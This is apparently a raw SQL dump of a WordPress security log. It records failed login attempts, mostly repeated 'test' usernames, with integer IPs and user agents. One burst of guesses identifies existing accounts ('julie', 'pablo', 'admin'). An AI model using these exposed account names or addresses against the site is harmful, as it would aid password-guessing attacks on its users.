(102817, 1499152376.565900, 1, 'loginFailInvalidUsername', 'test', 0, 3107509234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102818, 1499152377.589368, 1, 'loginFailInvalidUsername', 'test', 0, 3107509234, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102819, 1499153495.634384, 1, 'loginFailInvalidUsername', 'test', 0, 2344808799, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102820, 1499153497.439794, 1, 'loginFailInvalidUsername', 'test', 0, 2344808799, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102821, 1499154120.788679, 1, 'loginFailInvalidUsername', 'test', 0, 2017338319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102822, 1499154132.121417, 1, 'loginFailInvalidUsername', 'test', 0, 2017338319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102823, 1499154843.111333, 1, 'loginFailInvalidUsername', 'test', 0, 1095466700, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102824, 1499154844.384344, 1, 'loginFailInvalidUsername', 'test', 0, 1095466700, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102825, 1499155037.602454, 1, 'loginFailInvalidUsername', 'test', 0, 1328687829, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102826, 1499155038.819527, 1, 'loginFailInvalidUsername', 'test', 0, 1328687829, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102827, 1499156928.760034, 1, 'loginFailInvalidUsername', 'test', 0, 608848110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102828, 1499156931.893213, 1, 'loginFailInvalidUsername', 'test', 0, 608848110, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102829, 1499159152.576131, 1, 'loginFailInvalidUsername', 'test', 0, 2015137882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102830, 1499159154.165799, 1, 'loginFailInvalidUsername', 'test', 0, 2015137882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102831, 1499159471.704757, 1, 'loginFailInvalidUsername', 'test', 0, 1860242714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102832, 1499159473.103559, 1, 'loginFailInvalidUsername', 'test', 0, 1860242714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102833, 1499161117.192031, 1, 'loginFailInvalidUsername', 'test', 0, 712215576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102834, 1499161118.816199, 1, 'loginFailInvalidUsername', 'test', 0, 712215576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102835, 1499161315.980666, 1, 'loginFailInvalidUsername', 'test', 0, 3065577911, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102836, 1499161318.061556, 1, 'loginFailInvalidUsername', 'test', 0, 3065577911, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102837, 1499166767.718271, 1, 'loginFailInvalidUsername', 'test', 0, 694175085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102838, 1499166768.857099, 1, 'loginFailInvalidUsername', 'test', 0, 694175085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102839, 1499168133.259816, 1, 'loginFailInvalidUsername', 'test', 0, 3561984809, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102840, 1499168360.176295, 1, 'loginFailInvalidUsername', 'test', 0, 1328993562, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102841, 1499168361.155623, 1, 'loginFailInvalidUsername', 'test', 0, 1328993562, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102842, 1499168855.540085, 1, 'loginFailInvalidUsername', 'test', 0, 1603060450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102843, 1499168856.624875, 1, 'loginFailInvalidUsername', 'test', 0, 1603060450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102844, 1499169179.324966, 1, 'loginFailInvalidUsername', 'test', 0, 1568064878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102845, 1499169180.301503, 1, 'loginFailInvalidUsername', 'test', 0, 1568064878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102846, 1499171226.671344, 1, 'loginFailInvalidUsername', 'test', 0, 2588319117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102847, 1499171228.267702, 1, 'loginFailInvalidUsername', 'test', 0, 2588319117, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102848, 1499171405.474246, 1, 'loginFailInvalidUsername', 'test', 0, 1523763291, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102849, 1499171407.385997, 1, 'loginFailInvalidUsername', 'test', 0, 1523763291, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102850, 1499173309.663046, 1, 'loginFailInvalidUsername', 'test', 0, 2346371923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102851, 1499173311.383936, 1, 'loginFailInvalidUsername', 'test', 0, 2346371923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102852, 1499173636.155843, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102853, 1499173638.184587, 1, 'loginFailInvalidUsername', 'venez', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102854, 1499173640.339397, 1, 'loginFailInvalidUsername', 'outils', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102855, 1499173642.388643, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102856, 1499173644.379684, 1, 'loginFailInvalidUsername', 'travail', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102857, 1499173646.366799, 1, 'loginFailInvalidUsername', 'namur', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102858, 1499173649.089954, 1, 'loginFailInvalidUsername', 'center', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102859, 1499173651.280529, 1, 'loginFailValidUsername', 'julie', 2, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102860, 1499173653.256514, 1, 'loginFailValidUsername', 'pablo', 3, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102861, 1499173655.243257, 1, 'loginFailInvalidUsername', 'vous', 0, 1066346210, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102862, 1499174397.995513, 1, 'loginFailInvalidUsername', 'test', 0, 689998245, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102863, 1499174399.305702, 1, 'loginFailInvalidUsername', 'test', 0, 689998245, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102864, 1499175684.327234, 1, 'loginFailInvalidUsername', 'test', 0, 1081591968, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102865, 1499175685.549049, 1, 'loginFailInvalidUsername', 'test', 0, 1081591968, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102866, 1499175999.971476, 1, 'loginFailInvalidUsername', 'test', 0, 1731720724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102867, 1499176001.280596, 1, 'loginFailInvalidUsername', 'test', 0, 1731720724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102868, 1499181832.981632, 1, 'loginFailInvalidUsername', 'test', 0, 459544882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102869, 1499181834.476537, 1, 'loginFailInvalidUsername', 'test', 0, 459544882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102870, 1499186842.056303, 1, 'loginFailInvalidUsername', 'test', 0, 1332400581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102871, 1499186843.466230, 1, 'loginFailInvalidUsername', 'test', 0, 1332400581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102872, 1499187466.555290, 1, 'loginFailInvalidUsername', 'test', 0, 1317177366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102873, 1499187467.616855, 1, 'loginFailInvalidUsername', 'test', 0, 1317177366, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102874, 1499193386.282148, 1, 'loginFailInvalidUsername', 'test', 0, 3588707433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102875, 1499193387.308009, 1, 'loginFailInvalidUsername', 'test', 0, 3588707433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102876, 1499195817.037211, 1, 'loginFailInvalidUsername', 'test', 0, 3244113484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102877, 1499195818.236352, 1, 'loginFailInvalidUsername', 'test', 0, 3244113484, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102878, 1499196671.452576, 1, 'loginFailInvalidUsername', 'test', 0, 3019778404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102879, 1499196673.077767, 1, 'loginFailInvalidUsername', 'test', 0, 3019778404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102880, 1499197344.989616, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.79.16 (KHTML, like Gecko) Chrome/55.1.6735.1463 Safari/532.08 OPR/42.0.4012.9740'),
(102881, 1499197994.665903, 1, 'loginFailInvalidUsername', 'test', 0, 1450921007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102882, 1499197995.649006, 1, 'loginFailInvalidUsername', 'test', 0, 1450921007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102883, 1499198427.362537, 1, 'loginFailInvalidUsername', 'test', 0, 3056617734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102884, 1499198428.922620, 1, 'loginFailInvalidUsername', 'test', 0, 3056617734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102885, 1499199861.496768, 1, 'loginFailInvalidUsername', 'test', 0, 3104980322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102886, 1499202528.834577, 1, 'loginFailInvalidUsername', 'test', 0, 1466890100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102887, 1499202530.036290, 1, 'loginFailInvalidUsername', 'test', 0, 1466890100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102888, 1499206900.326002, 1, 'loginFailInvalidUsername', 'test', 0, 1807545404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102889, 1499210805.701757, 1, 'loginFailInvalidUsername', 'test', 0, 1768344095, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102890, 1499211381.831235, 1, 'loginFailInvalidUsername', 'test', 0, 1773851513, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102891, 1499211384.858665, 1, 'loginFailInvalidUsername', 'test', 0, 1773851513, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102892, 1499212035.345825, 1, 'loginFailInvalidUsername', 'test', 0, 2955898566, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102893, 1499213214.710340, 1, 'loginFailInvalidUsername', 'test', 0, 3122509240, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102894, 1499213216.613085, 1, 'loginFailInvalidUsername', 'test', 0, 3122509240, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102895, 1499213567.752139, 1, 'loginFailInvalidUsername', 'test', 0, 1496239585, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102896, 1499213568.893609, 1, 'loginFailInvalidUsername', 'test', 0, 1496239585, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102897, 1499214778.473498, 1, 'loginFailInvalidUsername', 'test', 0, 656658444, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102898, 1499214781.286107, 1, 'loginFailInvalidUsername', 'test', 0, 656658444, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102899, 1499216139.186706, 1, 'loginFailInvalidUsername', 'test', 0, 1333046822, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102900, 1499216140.174829, 1, 'loginFailInvalidUsername', 'test', 0, 1333046822, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102901, 1499217175.082038, 1, 'loginFailInvalidUsername', 'test', 0, 1768067581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102902, 1499217176.199552, 1, 'loginFailInvalidUsername', 'test', 0, 1768067581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102903, 1499220879.521308, 1, 'loginFailInvalidUsername', 'test', 0, 3588640443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102904, 1499220882.214309, 1, 'loginFailInvalidUsername', 'test', 0, 3588640443, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102905, 1499223674.273788, 1, 'loginFailInvalidUsername', 'test', 0, 3388120925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102906, 1499223675.680145, 1, 'loginFailInvalidUsername', 'test', 0, 3388120925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102907, 1499224174.358322, 1, 'loginFailInvalidUsername', 'test', 0, 2977790027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102908, 1499224176.043336, 1, 'loginFailInvalidUsername', 'test', 0, 2977790027, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102909, 1499226230.729704, 1, 'loginFailInvalidUsername', 'test', 0, 2332425310, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102910, 1499226232.021185, 1, 'loginFailInvalidUsername', 'test', 0, 2332425310, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102911, 1499227291.855121, 1, 'loginFailInvalidUsername', 'test', 0, 3111681667, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102912, 1499227292.889717, 1, 'loginFailInvalidUsername', 'test', 0, 3111681667, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102913, 1499229353.040905, 1, 'loginFailInvalidUsername', 'test', 0, 1445115722, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102914, 1499229354.005797, 1, 'loginFailInvalidUsername', 'test', 0, 1445115722, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102915, 1499235822.346113, 1, 'loginFailInvalidUsername', 'test', 0, 831707205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102916, 1499235824.196533, 1, 'loginFailInvalidUsername', 'test', 0, 831707205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102917, 1499235894.501177, 1, 'loginFailInvalidUsername', 'test', 0, 3000856442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102918, 1499235895.553806, 1, 'loginFailInvalidUsername', 'test', 0, 3000856442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102919, 1499236663.609922, 1, 'loginFailInvalidUsername', 'test', 0, 1839440452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102920, 1499236664.768266, 1, 'loginFailInvalidUsername', 'test', 0, 1839440452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102921, 1499239202.080760, 1, 'loginFailInvalidUsername', 'test', 0, 1550636993, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102922, 1499239272.091851, 1, 'loginFailInvalidUsername', 'test', 0, 656512273, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102923, 1499239402.290840, 1, 'loginFailValidUsername', 'julie', 2, 3399799176, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102924, 1499239404.848058, 1, 'loginFailValidUsername', 'admin', 1, 3510329944, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(102925, 1499240723.000655, 1, 'loginFailInvalidUsername', 'test', 0, 1307519161, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102926, 1499240723.931374, 1, 'loginFailInvalidUsername', 'test', 0, 1307519161, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102927, 1499240763.062832, 1, 'loginFailInvalidUsername', 'test', 0, 459949731, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102928, 1499240764.253936, 1, 'loginFailInvalidUsername', 'test', 0, 459949731, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102929, 1499243653.076370, 1, 'loginFailInvalidUsername', 'test', 0, 1448283507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102930, 1499243657.065772, 1, 'loginFailInvalidUsername', 'test', 0, 1448283507, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102931, 1499243884.835332, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.55.18) Gecko/20167444 Firefox/52.55.18'),
(102932, 1499244981.280964, 1, 'loginFailInvalidUsername', 'test', 0, 2588160204, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102933, 1499244982.552472, 1, 'loginFailInvalidUsername', 'test', 0, 2588160204, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102934, 1499245416.025057, 1, 'loginFailInvalidUsername', 'test', 0, 1081591866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102935, 1499245417.240062, 1, 'loginFailInvalidUsername', 'test', 0, 1081591866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102936, 1499245666.937825, 1, 'loginFailInvalidUsername', 'test', 0, 3032395560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102937, 1499245668.510612, 1, 'loginFailInvalidUsername', 'test', 0, 3032395560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102938, 1499246356.580126, 1, 'loginFailInvalidUsername', 'test', 0, 1445395224, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102939, 1499246357.682902, 1, 'loginFailInvalidUsername', 'test', 0, 1445395224, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102940, 1499247511.753672, 1, 'loginFailInvalidUsername', 'test', 0, 3158691865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102941, 1499247512.771448, 1, 'loginFailInvalidUsername', 'test', 0, 3158691865, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102942, 1499248242.879542, 1, 'loginFailInvalidUsername', 'test', 0, 658244531, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102943, 1499248244.794028, 1, 'loginFailInvalidUsername', 'test', 0, 658244531, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102944, 1499250375.494762, 1, 'loginFailInvalidUsername', 'test', 0, 996019409, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102945, 1499251985.587932, 1, 'loginFailInvalidUsername', 'test', 0, 609188809, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102946, 1499251987.529177, 1, 'loginFailInvalidUsername', 'test', 0, 609188809, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102947, 1499252675.880969, 1, 'loginFailInvalidUsername', 'test', 0, 1047266096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102948, 1499252677.120377, 1, 'loginFailInvalidUsername', 'test', 0, 1047266096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102949, 1499253890.699367, 1, 'loginFailInvalidUsername', 'test', 0, 453277495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102950, 1499253891.914226, 1, 'loginFailInvalidUsername', 'test', 0, 453277495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102951, 1499256143.960988, 1, 'loginFailInvalidUsername', 'test', 0, 1744507835, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102952, 1499256145.250213, 1, 'loginFailInvalidUsername', 'test', 0, 1744507835, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102953, 1499257081.411268, 1, 'loginFailInvalidUsername', 'test', 0, 2637234553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102954, 1499257083.269198, 1, 'loginFailInvalidUsername', 'test', 0, 2637234553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102955, 1499258171.146266, 1, 'loginFailInvalidUsername', 'test', 0, 778281968, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102956, 1499258172.231131, 1, 'loginFailInvalidUsername', 'test', 0, 778281968, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102957, 1499261449.572754, 1, 'loginFailInvalidUsername', 'test', 0, 771295430, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102958, 1499262155.447062, 1, 'loginFailInvalidUsername', 'test', 0, 702117457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102959, 1499262157.306201, 1, 'loginFailInvalidUsername', 'test', 0, 702117457, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102960, 1499265045.747495, 1, 'loginFailInvalidUsername', 'test', 0, 1529952294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102961, 1499265046.810751, 1, 'loginFailInvalidUsername', 'test', 0, 1529952294, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102962, 1499265147.555729, 1, 'loginFailInvalidUsername', 'test', 0, 2970739670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102963, 1499266196.004869, 1, 'loginFailInvalidUsername', 'test', 0, 1394013955, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102964, 1499266197.112255, 1, 'loginFailInvalidUsername', 'test', 0, 1394013955, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102965, 1499266900.714379, 1, 'loginFailInvalidUsername', 'test', 0, 3679144720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102966, 1499266902.427103, 1, 'loginFailInvalidUsername', 'test', 0, 3679144720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102967, 1499267803.117123, 1, 'loginFailInvalidUsername', 'test', 0, 1953905714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
